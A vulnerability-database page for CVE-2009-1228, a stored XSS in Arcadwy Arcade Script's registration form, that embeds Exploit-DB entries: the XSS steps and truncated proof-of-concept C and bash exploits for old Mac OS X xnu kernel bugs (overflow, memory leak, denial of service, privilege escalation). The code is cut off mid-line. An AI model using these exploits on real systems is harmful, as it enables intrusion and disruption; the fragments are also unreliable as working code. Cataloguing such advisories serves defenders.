CVE-2009-1228
published 2009-04-02CVE-2009-1228: Cross-site scripting (XSS) vulnerability in register.php in Arcadwy Arcade Script CMS allows remote attackers to inject arbitrary web script or HTML via the…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.52%
71.5th percentile
Cross-site scripting (XSS) vulnerability in register.php in Arcadwy Arcade Script CMS allows remote attackers to inject arbitrary web script or HTML via the username field (user_name parameter).
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting
exploitdb·2009-03-27
CVE-2009-1228 Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting
Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting
---
#################################\
# Information
# Script : Arcadwy Arcade Script CMS
# Buy/Download : http://arcadwy.com/
# Vulnerability : Static XSS
# Discovered by : Anarchy Angel
# Contact : anarchy[dot]ang31 [@] gmail
# Website : http://hha.zapto.org
# Greets : Xteaphn, lun0s, BSDgurl, progenic.
\#################################/
[!] EXPLOIT
1) Go to http://site.com/register.php
2) In username field input XSS payload
3) Fill in the rest of the fields and submit.
4) Activate account!
Every time the accounts username is shown on the site the XSS will run.
Usernames show in comments, game scores, and so on.
[!] FIX: Sanitize all input from the registers page form.
# milw0rm.com [2009-03-27]
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
exploitdb·2009-03-23
CVE-2009-1236 Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
---
/* xnu-appletalk-zip.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int
main (int argc, char **argv)
{
struct sockaddr_at daddr, saddr;
char *p, buf[1024];
int fd, zlen;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc [src addr]\n", argv[0]);
exit (EXIT_FAILURE);
}
if (!atalk_aton (argv[1], &daddr.sat_addr))
{
fprintf (stderr, "* dst address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
if (argc > 3)
{
if (!atalk_aton (argv[3], &saddr.sat_addr))
{
fprintf (stderr, "* src address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
}
daddr.sat_family = AF_APPLET
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
exploitdb·2009-03-23
CVE-2009-1237 Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
---
/* xnu-macfsstat-leak.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#define LEAK_BUFBYTES(a) (sizeof (struct statfs)*a)
#define LEAK_MACBYTES(a) (sizeof (int)*a)
struct __mac_getfsstat {
char *buf; char _pad[4];
int bufsize; char __pad[4];
char *mac; char ___pad[4];
int macsize; char ____pad[4];
int flags; char _____pad[4];
};
int
main (int argc, char **argv)
{
struct __mac_getfsstat req;
int i, n;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
memset (&req, 0, sizeof req);
req.buf = (char *) 0xDEADBEEF;
req.bufsize = LEAK_BUFBYTES (65536 * 64);
req.mac = (char *) 0xDEADBEEF;
req.macsize
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
exploitdb·2009-03-23
CVE-2009-1237 Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
---
/* xnu-profil-leak.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
/* profil defines */
#define PROFIL_LEAK_NUM 65536 * 128
int
main (int argc, char **argv)
{
char buf[1024];
int i, n;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
printf ("* opening profil, pid: %d...", getpid ());
if ((n = syscall (SYS_profil, &buf, sizeof buf, 0, 1)) < 0)
{
fprintf (stderr, "\n%s: syscall [SYS_profil]: failed: %d\n",
argv[0], n);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("* filling %d-bytes of kernel memory...\n", PROFIL_LEAK_NUM * 32);
fflush (stdout);
for (i = 0; i < PROFIL_LEAK_NUM; i++)
{
if ((n = syscall (SYS_
Exploit-DB
Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
exploitdb·2009-03-23
CVE-2009-1238 Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
---
/* xnu-vfssysctl-dos.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
void
hammer (void *arg)
{
char buf[1024 * (255 + 1)];
int n, name[6];
memset (buf, 0, sizeof buf);
while (1)
{
name[0] = CTL_VFS;
name[1] = 17;
name[2] = HFS_SET_PKG_EXTENSIONS;
name[3] = (int) buf;
name[4] = 1024;
name[5] = (rand () % 254) + 1;
n = sysctl (name, 6, NULL, NULL, NULL, 0);
usleep(10);
}
}
int
main (int argc, char **argv)
{
int i, n, tid;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
for (i = 0; i < 4; i++)
{
n = pthread_create (&tid, NULL, hammer, NULL);
if (n < 0)
{
fprintf (stderr, "failed creating ham
Exploit-DB
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation
exploitdb·2009-03-23
CVE-2009-1235 Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation
---
#!/bin/bash
# * xnu-hfs-fcntl-v2.sh
# *
# * Copyright (c) 2008 by
# *
# * Apple MACOS X 792.0 \n" \
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"
if [ ! -f $EXPFILE ]; then
echo -n "* compiling exploit..."
gcc -Wall $EXPFILE.c -o $EXPFILE 2> /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
fi
if [ ! -f $IMAGE.dmg ]; then
echo -n "* creating diskimage..."
hdiutil create -megabytes 1 -fs HFS+ -volname $IMAGE $IMAGE.dmg > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
fi
echo -n "* attaching/mounting diskimage..."
hdiutil attach $IMAGE.dmg > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
echo -e "* executing exploit...\n"
./$E
http://secunia.com/advisories/34506http://www.securityfocus.com/bid/34275https://exchange.xforce.ibmcloud.com/vulnerabilities/49472https://www.exploit-db.com/exploits/8296http://secunia.com/advisories/34506http://www.securityfocus.com/bid/34275https://exchange.xforce.ibmcloud.com/vulnerabilities/49472https://www.exploit-db.com/exploits/8296
2009-04-02
Published